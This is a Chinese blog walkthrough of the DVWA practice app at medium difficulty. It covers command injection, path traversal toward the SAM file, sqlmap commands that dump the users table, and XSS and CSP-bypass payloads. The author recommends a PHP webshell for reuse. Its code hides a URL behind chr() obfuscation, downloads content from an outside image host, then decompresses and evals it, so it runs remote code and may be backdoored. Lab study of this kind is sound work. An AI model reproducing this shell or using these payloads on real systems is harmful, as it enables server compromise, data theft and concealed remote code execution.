dvwa ---medium

最新推荐文章于 2024-04-08 20:53:50 发布
最新推荐文章于 2024-04-08 20:53:50 发布
阅读量406 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjb6988125/article/details/89892707
版权

dvwa —medium

Brute Force = 尝试登录成功

和low的差不多直接爆破就行
在这里插入图片描述

Command Injection = 尝试在服务器上列根目录

查看源代码发现只会替换掉 &&和;于是用 &
输入0.0.0.0 & dir ..\..\..
得到网站所在位置
在这里插入图片描述

File Inclusion = 尝试读取到服务器的密码(服务器是Linux)

查看源代码发现只会替换掉../.."但是..\具有一样的效果
但是服务器搭在windows上,所以直接访问C:\Windows\System32\config\SAM
但是好像因为权限的原因无法访问

File Upload = 上传一个PHP木马,并连接成功

用继续这个来连接(好用,偷笑.jpg)

 <?php

$password='myhack58';//登录密码(支持菜刀)

//----------功能程序------------------//

$c="chr";

session_start();

if(empty($_SESSION['PhpCode'])){

$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);

$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);

$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);

$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);

$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);

$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);

$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);

$get=chr(102).chr(105).chr(108).chr(101).chr(95);

$get.=chr(103).chr(101).chr(116).chr(95).chr(99);

$get.=chr(111).chr(110).chr(116).chr(101).chr(110);

$get.=chr(116).chr(115);

$_SESSION['PhpCode']=$get($url);}

$un=$c(103).$c(122).$c(105).$c(110);

$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));

@eval($un($_SESSION['PhpCode']));

?>

查看源代码发现
在这里插入图片描述
对文件上传的后缀会检验这个可以在发送的时候用burp抓包修改
开始尝试
在这里插入图片描述
将画圈的后缀改为.php
在这里插入图片描述

Insecure CAPTCHA = 忽略它

SQL Injection = 尝试拿到当前表名

用sqlmap

python27 sqlmap.py -r "1.txt" -p "id" 
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 --dbs
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 -D dvwa --tables
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 -D dvwa -T guestbook --dump
python27 sqlmap.py -r "1.txt"  --dbms mysql -p "id"  --level 3 -D dvwa -T users --dump

在这里插入图片描述
所以当前的表名为 users

SQL Injection (Blind) = 尝试拿到当前数据库名

python27 sqlmap.py -r "1.txt" -p "id"
python27 sqlmap.py -r "1.txt" --dbms mysql -p "id" --dbs

在这里插入图片描述
数据库名为dvwa

Weak Session IDs = 忽略它

XSS (DOM) = 尝试弹一个对话框

></option></select><img src=1 onerror=alert("xss");>
用火狐和谷歌浏览器去弄直接输入都不可以。。
后来问了学长发现是浏览器太高级了
用ie就可以了
在这里插入图片描述

XSS (Reflected) = 尝试弹一个对话框

不太会直接百度的
输入<img src=1 onerror=alert(0)>
在这里插入图片描述

XSS (Stored) = 尝试弹一个对话框

查看源代码发现不会对用户名进行检查
但是有字数限制,用burp抓包修改来绕过
<img src=1 onerror=alert(0)>
在这里插入图片描述

CSP Bypass = 尝试弹一个对话框

查看源码发现nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA="的script可以执行
<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(1);</script>
在这里插入图片描述

JavaScript = 尝试拿到正确的Token

查看js代码

function do_something(e)
{
	for(var t="",n=e.length-1;n>=0;n--)
		t+=e[n];
return t
}
setTimeout(function(){do_elsesomething("XX")},300);
function do_elsesomething(e)
{
	document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")
}

发现输入如果为success,token=“XXsseccusXX”
用burp抓包
令token=“XXsseccusXX”,phrase=“success”
成功
在这里插入图片描述

ccreater
关注
专栏目录
渗透测试之DVWAMedium级别的SQL注入
追风筝的孩子
08-14 6325
Medium SQL Injection Source是通过一个下拉表的方式提交数据的。选择数据后提交,发现URL不是GET注入,是把提交的数据存放到post数据中 先把源代码放出来 &lt;?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $id = $_POST[ 'id' ]; $id = mysql_real_e...
DVWA教程(二)——Medium级别
weixin_47610939的博客
07-12 520
dvwa中级难度通关指南
DVWA-medium详解
hxhxhxhxx的博客
09-13 1101
DVWA-medium详解Brute Force(暴力破解)Command injection(命令执行)Cross Site Request Forgery(CSRF跨站脚本伪造)File Inclusion(文件包含)fileupload 文件上传Insecure CAPTCHA(不安全的验证码)SQL Injection(SQL注入)SQL Injection (Blind)(SQL注入盲注)Reflected Cross Site Scripting(XSS)(反射型跨站脚本)Stored Cros
DVWAMedium通关1-4
weixin_50998641的博客
01-31 193
一.Brute Force 中等难度无法使用sql注入,所以直接用Burp进行爆破 二.Command Injection 先看代码 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Set blacklist $substitutions = array( '&&' => '', ';
DVWA系列之8 medium级别命令执行漏洞
weixin_34405332的博客
12-09 255
DVWA Security设置为medium,在Command Execution中点击“View Source”查看网页源码。这将用于接收用户输入IP的变量$target做了过滤,过滤的方法是定义了一个黑名单。$substitutions = array('&amp;&amp;' =&gt; '' , ';' =&gt; '', );这行语句的意思是定义了一个数组并赋值给变量$substit...
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
- **漏洞等级**:根据其严重性和利用难度分为low、medium、high三个级别。 - **漏洞测试**:通过模拟攻击的方式验证应用程序中是否存在已知的安全漏洞。 #### 任意命令执行漏洞 1. **漏洞分析**: - 在低级漏洞中...
DVWA-master.zip
09-16
2. 启动服务:运行DVWA,访问默认的登录页面,了解每个安全级别(Low, Medium, High, Impossible)的设置。 3. 分析漏洞:逐个挑战每个漏洞,了解其原理,尝试构造攻击payload。 4. 使用工具:配合Burp Suite、...
DVWA-master
12-10
6. **安全级别设置**:DVWA的每个漏洞场景都有不同的难度级别,从低到高分别为“Low”、“Medium”、“High”、“ Impossible”,用户可以根据自己的水平选择合适的挑战。 通过参与"DVWA-master"的学习和实践,不仅...
DVWA - SQL Injection (medium)
qq_42630215的博客
05-28 287
medium级别(手工注入 和 sqlmap工具注入) 手工注入 因为该级别设置了下拉菜单,提交后URL中没有显示ID,提交方式为POST,所以用burpsuite抓包,更改参数。 1.判断是否存在注入,注入的类型是字符型还是数字型 id=1&Submit=Submit id=1’ &Submit=Submit id=1 and 1=1&Submit=Submit id=1 and 1=2&Submit=Submit 2.猜测字段数 3.确定显示的字段顺序 4.获取当
DVWA漏洞平台学习之Medium级别
李熠专用博客_白帽子一枚,人称低危终结者
12-01 515
Medium级别,DVWA平台对每个漏洞都加入了一定程度的WAF,它不像LOW级别那样,可以轻松的利用每个漏洞。在Medium级别下,我们需要想办法绕过WAF。 我们首先改变DVWA Security为Medium级别,然后开始对每个漏洞进行利用。 0x00 Brute Force-暴力破解 查看源码: 可以拿到,它登录失败后,增加2秒的睡眠时间,我们依然可以爆破,只是增加了爆破时间而已。 0x01 Command Injection-命令注入 0x02 CSRF-客户端请求伪造 0x03 File I
XSS攻击-DVWAMedium
天威一号
11-21 348
士大夫VS的
DVWA sql注入 (Medium
gclome的博客
07-05 3183
上节虽然写了low,可是发现自己对判断是否有注入点还有判断是字符型注入或数字型注入还是不太清楚,于是又找了一个讲解: https://www.cnblogs.com/qq3285862072/p/9439573.html 现在开始做medium的SQL注入 由于上面不方便直接输入,于是用burpsuite进行拦截然后修改 1.改成1'改成1 and 1=1 改成1 and 1=2 则可以判断为数字...
DVWA sql injection medium
weixin_43345082的博客
06-12 327
我们发现是post型注入 于是用hackbar进行注入 按照low的注入顺序,先爆库 Submit=Submit&id=1’ union select 1,database()# 这居然会报错,仔细看错误,发现莫名其妙多出‘\’看源码 百度一下这个函数 将非法字符转义了,那么我们避免输入这些字符就好了 于是构造 Submit=Submit&id=1 union select...
DVWA靶场通关教程(medium、high)
最新发布
npc88888的博客
04-08 902
这题有点滑头,是这样的,输入的时候会弹出一个框嘛,然后查看发出的请求就会发现,在弹出框中输入的注入语句会传到原本网页的cookie中,再传入。high难度多了个token,具体思路就是先登录,然后在浏览器中获取cookie然后放入脚本的请求头中,get请求获得token,再用这个token登录。所以我们可以把链接写成页面传入服务器,然后把页面名改为网站ip,再在网站中点入页面,就可以修改密码了。前面的过程不写了,思路是一样的,把密码爆破出来就行。如果用low的方法直接发链接,是过不了这个验证的。
SQL injection on DVWA (medium Level)
312小公举的专栏
05-13 2324
medium与low的区别在于对对输入的数据进行了转义处理,多了$id = mysql_real_escape_string($id);  这句。 在这输入‘会有如下结果: 不用担心还有好多是可以用哒~~ 输入1 or 1=1: 得到了所有id对应的用户。 接下来用union select 输入 1 or 1=1 union select 1,2-- 可以正
[网络安全]DVWA之SQL注入—medium level解题详析
热门推荐
等风来
04-21 1万+
这行代码使用了PHP内置的 mysqli_real_escape_string() 函数对 $id 变量进行转义处理,以防止 SQL 注入攻击。在 Web 应用程序中,当用户在浏览器中提交表单时,浏览器会对数据进行 URL 编码,然后再将编码后的数据发送到后端服务器上。group_concat函数 是 MySQL 中的一个聚集函数,用于将指定列(或表达式)的值以逗号分隔的形式进行拼接。由于字符串’dvwa’中所有的字符均不需要编码,所以URL编码绕过失效。等),剩下的其它所有字符必须通过%xx编码处理。
DVWA 靶场之 Brute Force-Low&Medium(前期配置铺垫与渗透方法及源码分析)
Welcome To Myon'Blog !
02-18 1598
还需要解决一个问题,因为我们的 DVWA 靶场搭建在本地,127.0.0.1 是一个回环地址,burpsuite 是无法抓取的,需要替换成自己的内网地址并进行一些配置。该代码对用户名和密码进行了输入验证,使用了 mysqli_real_escape_string() 函数来消毒输入,转义特殊字符,一定程度上可以防御 SQL 注入攻击。在登录失败的情况下,该代码添加了一个 sleep(2) 的延迟,它会增加攻击者猜测密码的时间,可以一定程度上抵御暴力破解攻击,但是攻击者任然可以直接进行爆破。
dvwa medium级别前五漏洞测试
苟有恒,必有三更眠,五更起。
12-24 1233
brute force(暴力破解)发现medium级别直接SQL注入,不行了, 看源码,相比于low级别,medium级别多了这样几行代码:$user = ((isset($GLOBALS["___mysqli_ston"]) &&is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___my
深入理解MySQL安全(三)-DVWA medium SQL注入方法
zhujiu_fu的博客
02-14 210
DVWA medium SQL注入的思路与方法
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值